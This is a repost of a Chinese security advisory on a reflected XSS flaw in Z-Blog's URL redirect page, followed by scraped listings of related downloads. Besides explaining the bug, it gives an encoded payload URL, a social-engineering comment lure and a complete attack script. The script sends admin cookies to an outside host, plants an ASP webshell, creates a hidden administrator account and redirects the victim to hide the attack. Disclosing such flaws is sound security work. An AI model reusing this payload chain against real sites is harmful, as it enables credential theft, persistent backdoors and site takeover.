`
jannock
  • 浏览: 1788 次
  • 性别: Icon_minigender_1
  • 来自: 广州
最近访客 更多访客>>
文章分类
社区版块
存档分类
最新评论

Z-blog跨站脚本攻击漏洞

阅读更多

漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持 Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z- blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是80sec在产品中发现一个严重的跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。

漏洞厂商:http://www.rainbowsoft.org/

漏洞解析:在FUNCTION/c_urlredirect.asp中,程序对提交的url参数做如下处理

strUrl=URLDecodeForAntiSpam(Request.QueryString("url"))

其中URLDecodeForAntiSpam是防止垃圾连接的解码函数,其函数处理如下

Function URLDecodeForAntiSpam(strUrl)

Dim i,s
For i =1 To Len(strUrl) Step 2
s=s & Mid(strUrl,i,1)
Next
URLDecodeForAntiSpam=s

End Function

在做如上处理之后程序将在c_urlredirect.asp输出url参数

...
<meta http-equiv="refresh" content="0;URL=<%Response.Write strUrl%>“/>


精心构造url参数将能构造一个url类型的非持久xss如下:

http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1×2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex

上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。

而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下:

看这个站,有新东西?
http://www.80sec.com

用户看到的是http://www.80sec.com这个信任的站点,而一旦点击将在www.foo.com域执行恶意用户指定的js,在该js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下:

xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf('password')==-1?0:1;
tolocation='http://www.80sec.com/&#39;;

//get cookie
x=new Image();
x.src="http://www.80sec.com/c.php?c="+escape(document.cookie);

//get a shell
data="txaContent=<%25execute(request(%22a%22))%25>“;
postmydata(”http://www.0×37.com/cmd.asp?act=SiteFilePst&path=%2E%2FUPLOAD%2Findex%2Easp&opath=”,data);

//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”;
postmydata(”http://www.0×37.com/cmd.asp?act=UserCrt”,data);

//fool the user
window.location=tolocation;

function poster(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(’text/xml’);
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}

function postmydata(action,data){
xmlhttp.open("POST", action, false);
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.send(data);
return xmlhttp.responseText;
}

漏洞状态:已经联系官方,请等待官方公告。
本站内容均为原创,转载请务必保留署名与链接!
Z-blog跨站脚本攻击漏洞:http://www.80sec.com/zbog-xss.html

分享到:
评论

相关推荐

    xss跨站脚本攻击汇总

    xss 跨站脚本攻击是一种常见的 web 应用程序漏洞,攻击者可以inject 恶意脚本到网页中,从而获取用户的敏感信息或控制用户的浏览器行为。下面是 xss 跨站脚本攻击的一些常见类型: 1. 普通的 XSS JavaScript 注入:...

    基于PHP的Z-Blog PHP博客程序.zip

    Z-Blog PHP是一款基于PHP语言开发的开源博客系统,它为个人或团队提供了一个功能强大、易于使用的在线出版平台。这个压缩包“基于PHP的Z-Blog PHP博客程序.zip”包含了一个完整的Z-Blog PHP安装包,允许用户快速搭建...

    跨站脚本,参考学习

    跨站脚本(Cross-Site Scripting,简称XSS)是一种常见的网站安全漏洞,攻击者通过注入恶意脚本代码到信任的网页上,当用户浏览该网页时,嵌入其中的恶意脚本会被执行,进而窃取用户的敏感数据或进行其他非法操作。...

    Z-Blog v1.8 Walle Build 100427 (自动安装包)-ASP源码.zip

    作为一款成熟的博客系统,Z-Blog v1.8 Walle Build 100427 在安全性方面做了不少工作,包括对输入数据的过滤、防止SQL注入、XSS攻击等。同时,定期的更新和补丁修复了已知的安全漏洞,确保用户的博客安全。 **7. ...

    Netsparker.7z 绿色安装包 与其他安全扫描工具相比更好检测SQL注入和跨站脚本攻击类型的安全漏洞

    其次,跨站脚本攻击(XSS)通常涉及将恶意脚本注入到网页中,当用户访问时,脚本会在用户的浏览器上执行。这可能导致钓鱼、会话劫持或者信息盗窃。Netsparker对此类攻击的检测也非常到位,它可以识别并防止不安全的...

    js脚本攻击大全

    XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到看似可信的网站上。当用户浏览这些被注入恶意脚本的网页时,恶意脚本会在用户的浏览器环境中执行,从而导致...

    E073-PHP应用安全-针对客户端脚本注入漏洞的安全开发.pdf

    【PHP应用安全】客户端脚本注入漏洞是Web应用程序常见的安全问题之一,主要发生在用户可以通过输入字段传递可执行脚本到服务器端,导致恶意脚本在客户端执行,影响用户体验,甚至可能导致敏感信息泄露或被篡改。...

    xsser.7z漏洞练习靶场

    XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中注入恶意脚本,从而控制用户的交互行为或者窃取敏感信息。这个"Xsser.7z漏洞练习靶场"提供了一个平台,帮助安全...

    Cardable sites-20200608T151740Z-001_guia_website_carding.zip

    3. **源代码审查**:如何通过阅读和分析源代码来发现潜在的安全漏洞,如SQL注入、跨站脚本(XSS)攻击等,并提供修复建议。 4. **网络犯罪的法律后果**:强调从事或协助信用卡欺诈的法律责任,提醒用户和开发者都应...

    DVWA-master.7z 压缩包

    - 跨站脚本(XSS):攻击者通过在网页中插入恶意脚本,使用户浏览器执行。 - 跨站请求伪造(CSRF):攻击者利用用户的已登录状态,诱使用户进行非预期的操作。 - 文件包含漏洞:允许攻击者将外部文件内容包含到应用...

    FCKeditor漏洞总结

    - **描述**:FCKeditor允许用户上传文件到服务器,如果文件上传功能未被正确保护,攻击者可以上传恶意脚本文件。 - **子类型** - **4.1**:通过上传单一恶意文件实现攻击(如`shell.php`),适用于Windows和*nix...

    CNVD-2020-10487.7z

    标题中的"CNVD-2020-10487.7z"是指中国国家信息安全漏洞库(China National Vulnerability Database,简称CNVD)在2020年记录的一个编号为CNVD-2020-10487的安全漏洞。这个漏洞主要涉及到Apache Tomcat服务器,而...

    xsschallenge.7z

    XSS(Cross Site Scripting)挑战,正如“xsschallenge.7z”这个压缩包所暗示的,是一种网络安全训练,旨在帮助用户理解并应对跨站脚本攻击。XSS攻击是Web应用中常见的一种安全威胁,它允许攻击者在用户的浏览器上...

    PDF攻击实例-USF-ISA-SWA-Shadow Attack.7z

    4. 关闭JavaScript:在PDF阅读器设置中禁用JavaScript支持,可以降低被恶意脚本攻击的风险。 5. 检查数字签名:验证PDF文件的数字签名,确保文件未被篡改。 6. 使用在线PDF扫描工具:在打开未知文件前,可以通过...

    web安全渗透测试.7z

    7. **XSS** - 跨站脚本攻击的相关资料,可能包括示例、工具或防御策略。 8. **sqlmapproject-sqlmap-c1825b2** - SQLMap是一个流行的自动化SQL注入工具,用于检测和利用SQL注入漏洞。 9. **靶场源码** - 仿真Web应用...

    掌握漏洞利用第二版20169.epub.7z

    2. **漏洞分类**:书中可能涉及多种类型的漏洞,如缓冲区溢出、整数溢出、格式字符串漏洞、SQL注入、跨站脚本(XSS)、权限提升等。 3. **缓冲区溢出**:一种常见的漏洞类型,当程序尝试写入超出分配内存空间的数据...

    python工具集合脚本.zip

    这些脚本通常用于网络安全检测、漏洞利用和系统审计。 【描述】这个压缩包中的脚本集是渗透测试人员常用的工具,它们可以帮助用户发现并利用系统的安全弱点。Python因其易读性、强大的库支持以及在网络编程上的广泛...

    Z管家1.5.rar

    3. **安全性考虑**:由于ASP程序可能面临SQL注入、跨站脚本攻击(XSS)等问题,Z管家1.5在设计时应该考虑了这些安全措施,比如输入验证、输出编码等。但是,免费程序的安全性可能不如专业商业软件,使用时需要定期更新...

    SNIff嗅探工具

    ettercap是一款功能强大的网络嗅探和欺骗工具,它不仅可以捕获数据包,还可以进行中间人攻击(Man-in-the-Middle,MITM),这使得ettercap在网络安全测试和渗透测试中十分有用。 在【压缩包子文件的文件名称列表】...

    awvs14.7z补丁版本

    2. **跨站脚本攻击(XSS)**:XSS允许攻击者在用户浏览器上执行恶意脚本,获取用户会话信息或执行其他有害操作。AWVS 14.7z可能强化了对输出编码的处理,避免XSS漏洞的产生。 3. **跨站请求伪造(CSRF)**:CSRF攻击...

Global site tag (gtag.js) - Google Analytics